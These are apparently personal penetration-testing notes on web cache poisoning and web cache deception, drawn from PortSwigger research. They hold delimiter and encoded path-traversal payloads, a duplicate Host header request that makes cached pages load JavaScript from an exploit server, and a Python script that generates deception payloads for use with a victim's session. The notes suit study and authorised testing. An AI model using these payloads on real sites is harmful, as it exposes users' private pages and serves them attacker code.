What is Cache Poisoning

Cache poisoning is an attack where the attacker gets a cache (DNS, web or CDN) to store a response they influenced, so that other users are served incorrect or harmful content, for example a page that loads its JavaScript from an attacker-controlled host. The path tricks in these notes are the closely related web cache deception attack from the PortSwigger research linked below: the attacker tricks the cache into storing a victim's private, dynamic response (e.g. /my-account) under a key the cache considers static, then retrieves it from the cache. In both cases the root cause is the cache and the origin interpreting the same request differently.


Searching for Cache Poisoning

- Web cache
- Origin delimiters
- URL discrepancies (delimiters, encoding, dot-segment normalisation)

https://portswigger.net/research/gotta-cache-em-all

---------------------------------------------------------------------------------
# Detecting origin delimiters (dynamic / static path)

- GET /my-account ---> baseline (200, the victim's page)
- GET /my-account/abc ---> 404? The origin doesn't map sub-paths onto /my-account (no prefix matching)
- GET /my-accountabc ---> 404? The origin matches the path exactly, so a baseline-identical response for /my-account<delim>abc can only come from the delimiter cutting the path
- GET /my-account§§abc (Intruder, payloads = the delimiter list below) ---> every response identical to the baseline marks a character the origin treats as a path delimiter

Different frameworks use different delimiters on the origin (e.g. ; for Spring/Tomcat), and each CDN has its own set as well; test both sides.

---------------------------------------------------------------------------------
# Path caching

- GET /<arbitrary directory>/..%2fmy-account ---> see how each side resolves it (200 | 400 | 404)
- Try the delimiter discrepancies with and without encoding (%2f, %2e, %3f, %23, ...)
- Find a resource type the cache actually stores (images, .css/.js, well-known static files, ...) to use as the static target

---------------------------------------------------------------------------------
# Detecting cache delimiters

## If the cache server resolves encoded dot-segments but the origin server doesn't, craft the path so that each side sees a different resource:

- GET /<dynamic-path>%2f%2e%2e%2f<static-directory-prefix> (encoded ../)
- ex: /profile%2f%2e%2e%2fstatic
	- The cache interprets the path as: /static (decodes, then resolves ..)
	- The origin server interprets the path as: /profile%2f%2e%2e%2fstatic (no decoding; the response tells you whether the cache normalised)

- ex: /profile;%2f%2e%2e%2fstatic (origin treats ; as a delimiter)
	- The cache interprets the path as: /static
	- The origin server interprets the path as: /profile ---> the private page is now cached under /static

- Combine an origin delimiter with a cached path: /my-account?%2f%2e%2e%2fresources

- Or target files most caches store by name (robots.txt, index.html, favicon.ico):
- /profile%2f%2e%2e%2findex.html

# Delimiter discrepancies

Combine encoding techniques with path traversal to expand the testing scope.

- ?                   ---> /profile?foo
- ;                   ---> /profile;foo.css
- .                   ---> /profile.css
- :
- #                   ---> /profile#abc.js & /profile%23wcd.css (encoded)
- [ or ]
- @
- !
- $
- &
- "
- ( or )
- *
- +
- =
- %00                 ---> /profile%00foo.js
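Added example (my code, not from the PortSwigger research or these notes): a toy model of the cache-vs-origin path parsing that the "Detecting origin delimiters" and "Detecting cache delimiters" sections above rely on, with the Intruder-style delimiter sweep and the %2f%2e%2e%2f traversal in one script. The cache rules (decode %XX, no delimiters, resolve dot-segments) and origin rules (cut the path at ; and ?, never decode) are assumptions chosen to reproduce the /profile examples; `fake_origin` is a constructed stand-in for a real HTTP fetch so it runs offline.

```python
"""Added example for these notes (not PortSwigger's code and not any CDN's real
parser): a toy model of the cache-vs-origin path discrepancies that web cache
deception relies on, plus the Intruder-style delimiter sweep. Every parsing
rule below is an assumption chosen to reproduce the /profile examples above."""
from urllib.parse import unquote

# Candidate delimiters, same list as the sweep above
DELIMITERS = ["?", ";", ".", ":", "#", "[", "]", "@", "!", "$", "&", '"',
              "(", ")", "*", "+", "=", "%00"]
STATIC_DIRS = ("/static", "/assets", "/wp-content", "/media", "/templates",
               "/public", "/shared")
STATIC_FILES = ("/robots.txt", "/favicon.ico", "/index.html")
STATIC_EXTS = (".css", ".js", ".png", ".ico", ".txt", ".html")


def path_view(raw, delimiters=(), decode=False, resolve_dots=False):
    """How one party (cache or origin) reads a raw request path.

    delimiters   -- characters that terminate the path for this party
    decode       -- whether %XX is decoded before the path is interpreted
    resolve_dots -- whether '.' and '..' segments are collapsed
    """
    path = unquote(raw) if decode else raw
    for d in delimiters:
        path = path.split(d, 1)[0]
    if not resolve_dots:
        return path
    out = []
    for seg in path.split("/"):
        if seg == "..":
            if out:
                out.pop()
        elif seg not in ("", "."):
            out.append(seg)
    return "/" + "/".join(out)


def looks_static(path):
    """Assumed cache rule: static dir prefix, well-known static file, or static extension."""
    return (path in STATIC_FILES or path.endswith(STATIC_EXTS)
            or any(path == d or path.startswith(d + "/") for d in STATIC_DIRS))


# Assumed behaviour of the two parties (CDN decodes + normalises; a Spring/Tomcat-like
# origin cuts the path at ';' and '?' and never decodes %2f)
CACHE = dict(delimiters=(), decode=True, resolve_dots=True)
ORIGIN = dict(delimiters=(";", "?"), decode=False, resolve_dots=False)


def split_views(raw, cache=CACHE, origin=ORIGIN):
    """Return (cache key, path the origin actually serves) for one payload."""
    return path_view(raw, **cache), path_view(raw, **origin)


def is_deception(raw, target, cache=CACHE, origin=ORIGIN):
    """True when the origin serves `target` but the cache files it under a static-looking key."""
    cache_key, origin_path = split_views(raw, cache, origin)
    return origin_path == target and looks_static(cache_key)


def deception_candidates(target, delimiters, cache=CACHE, origin=ORIGIN):
    """Enumerate <target><delim>%2f%2e%2e%2f<static> payloads and keep those that work."""
    found = []
    for d in delimiters:
        for static in STATIC_DIRS + STATIC_FILES:
            raw = f"{target}{d}%2f%2e%2e%2f{static.lstrip('/')}"
            if is_deception(raw, target, cache, origin):
                found.append(raw)
    return found


def sweep_delimiters(fetch, target, delimiters=DELIMITERS, junk="abc"):
    """Intruder-style sweep: <target><delim><junk> answering exactly like <target>
    means the origin stops reading the path at <delim>. Returns None when the
    origin prefix-matches (then a junk suffix cannot discriminate)."""
    baseline = fetch(target)
    if fetch(target + junk) == baseline:
        return None
    return [d for d in delimiters if fetch(target + d + junk) == baseline]


def fake_origin(raw):
    """Constructed stand-in for a real fetch(): (status, body) from the assumed origin."""
    path = path_view(raw, **ORIGIN)
    return (200, "account page") if path == "/my-account" else (404, "not found")


if __name__ == "__main__":
    print(sweep_delimiters(fake_origin, "/my-account"))   # ['?', ';']
    print(split_views("/profile%2f%2e%2e%2fstatic"))      # ('/static', '/profile%2f%2e%2e%2fstatic')
    print(split_views("/profile;%2f%2e%2e%2fstatic"))     # ('/static', '/profile')
    for payload in deception_candidates("/my-account", DELIMITERS)[:3]:
        print(payload, "->", split_views(payload))
```

Swap the `ORIGIN` dict for the delimiter set the sweep actually found on a target, and the `CACHE` dict for what the traversal probes showed (e.g. whether `?` ends the cache key), and `deception_candidates` gives the payload list worth sending with a logged-in victim session.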

---------------------------------------------------------------------------------
# Static directories

- /static
- /assets
- /wp-content
- /media
- /templates
- /public
- /shared
- ...

Example: /profile%2f%2e%2e%2fstatic  ---> Cache = /static | Server = /profile%2f%2e%2e%2fstatic (or /profile if the origin cuts the path at a delimiter placed before %2f)

---------------------------------------------------------------------------------

# Static files

- /robots.txt
- /favicon.ico
- /index.html

Example: /myAccount$/..%2frobots.txt  ---> Cache = /robots.txt | Server = /myAccount

Exploitation

# Poison header (targeting element source)

GET / HTTP/1.1
Host: website.com
Host: exploit-server.net

If the origin uses the second Host header when it builds absolute URLs (e.g. a <script src>) and the cache stores the result under the key for website.com, the cached page now points at exploit-server.net. On the exploit server, recreate the same directory structure and file name as the JavaScript file on website.com, so that when the poisoned page loads, the browser fetches the JS from exploit-server.net instead of website.com.

---------------------------------------------------------------------------------

Extra Information

The following tables illustrate how different HTTP servers and web cache proxies normalise the path /hello/..%2fworld. Some decode %2f and resolve the path to /world, while others don't normalise it at all; a pair where the cache normalises and the origin doesn't is what the traversal payloads above rely on.

![[Pasted image 20241203091043.png]]

Each CDN or cache proxy defines its own list of recognised static extensions (and static directories / file names) that decide whether a response is cached. The image below shows those listed by Cloudflare:

![[Pasted image 20241203091233.png]]

# Poison page

/home(DELIMITER)/../exploit        ---> origin serves /home, cache resolves the key to /exploit

/style.css$/../exploit